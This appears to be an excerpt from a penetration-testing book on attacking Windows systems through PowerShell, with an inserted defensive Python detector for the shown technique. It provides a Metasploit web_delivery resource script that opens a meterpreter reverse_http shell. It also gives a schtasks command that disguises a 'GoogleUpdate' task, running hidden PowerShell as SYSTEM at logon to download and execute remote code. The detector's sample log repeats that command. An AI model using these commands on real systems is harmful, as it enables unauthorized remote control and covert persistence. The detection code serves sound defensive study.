Attacking systems using Windows PowerShell

Windows PowerShell is a command-line shell and scripting language intended to be used for system administration. Based on the .NET framework, it extends the capabilities that were available in VBScript. The language itself is quite extensible. Since it is built on .NET libraries, you can incorporate code from languages such as C# or VB.NET. You can also take advantage of third-party libraries. In spite of this extensibility, it is a concise language. VBScripts that require more than 100 lines of code can be reduced to as little as 10 lines of PowerShell!

Perhaps the best feature of PowerShell is that it is available by default on most modern Windows operating systems (Windows 7 and later) and cannot be removed.

To launch the attack, we will use the PowerShell Payload Web Delivery module of the Metasploit framework. The purpose of this module is to rapidly establish a session on the target system. The attack does not write to the disk, so it is less likely to trigger detection by client-side antivirus. Launching the attack and the available module options are shown in the following screenshot:

Before the attack can complete, the attacker must have a listener ready for the incoming shell. The URIPATH is randomly generated by Metasploit; make sure that the listener is configured with the correct URIPATH. A simple resource script that sets up the listener is as follows:

use exploit/multi/script/web_delivery
set SRVHOST <your IP>
set target 2
set payload windows/meterpreter/reverse_http
set LHOST <your IP>
set URIPATH boom
exploit

The Metasploit framework will generate a one-line Python script that can be embedded or run on the target as shown in the following screenshot:

A successful attack will create an interactive limited shell on the attacker's system.

It is possible to make web_delivery persistent using the schtasks command.

The following command will create a scheduled task, GoogleUpdate, which will invoke powershell.exe (by default, located in the Windows\system32 directory) at logon:

schtasks /ru "SYSTEM" /create /tn GoogleUpdate /tr "powershell -windowstyle hidden -nologo -noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).DownloadString(''http://192.168.0.24:8080/boom''))'" /sc onlogon
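A defender-side counterpart, added here and not part of the book: a small Python detector that scores process-creation log lines for the combined markers of the scheduled-task persistence shown above (hidden window, execution-policy bypass, IEX/DownloadString download cradle, schtasks /create, onlogon trigger). The 'key=value|key=value' log layout, the host names and the sample events are constructed for this example.

```python
import re

# Indicators drawn from the scheduled-task persistence command above.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("ep_bypass",       re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("download_cradle", re.compile(r"\bIEX\b.*DownloadString\(", re.I)),
    ("schtasks_create", re.compile(r"schtasks(?:\.exe)?\s.*?/create\b", re.I)),
    ("onlogon_trigger", re.compile(r"/sc\s+onlogon\b", re.I)),
]

def score_cmdline(cmdline):
    """Return (score, matched indicator names) for one process command line."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    return len(hits), hits

def parse_event(line):
    """Parse a constructed 'key=value|key=value' process-creation event line."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)

def find_suspicious(log_lines, threshold=3):
    """Return [(host, image, score, hits)] for events scoring at/above threshold.
    One indicator alone (e.g. '-ep bypass' in an admin script) is not enough;
    the combination is what marks the download-cradle persistence."""
    findings = []
    for line in log_lines:
        ev = parse_event(line)
        score, hits = score_cmdline(ev.get("cmdline", ""))
        if score >= threshold:
            findings.append((ev.get("host", "?"), ev.get("image", "?"), score, hits))
    return findings

# Constructed sample events: a benign backup task, the persistence task from the
# text (lab IP 192.168.0.24 as in the original command), and a benign admin script.
SAMPLE_LOG = [
    'host=WS01|image=C:\\Windows\\System32\\schtasks.exe|cmdline=schtasks /create /tn Backup /tr "robocopy C:\\data D:\\bak" /sc daily',
    "host=WS02|image=C:\\Windows\\System32\\schtasks.exe|cmdline=schtasks /ru \"SYSTEM\" /create /tn GoogleUpdate /tr \"powershell -windowstyle hidden -nologo -noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).DownloadString(''http://192.168.0.24:8080/boom''))'\" /sc onlogon",
    "host=WS03|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmdline=powershell -ep bypass -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for host, image, score, hits in find_suspicious(SAMPLE_LOG):
        print(f"{host}: score={score} image={image} hits={','.join(hits)}")
```

In a real deployment the same scoring would run over Sysmon Event ID 1 or Security Event ID 4688 command lines rather than the constructed layout used here.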

Additional PowerShell scripts designed to support post-exploitation activities can be found in Kali's PowerSploit directory. In spite of its flexibility, PowerShell has some disadvantages.

For example, if the document containing the macro is closed by the end user before a persistence mechanism can be applied, the connection is lost.

More importantly, scripting languages such as VBScript and PowerShell are only useful against Microsoft environments. To extend the reach of client-side attacks, we need to look for a common client-side vulnerability that can be exploited regardless of the operating system. One particular example of such a vulnerability is cross-site scripting.
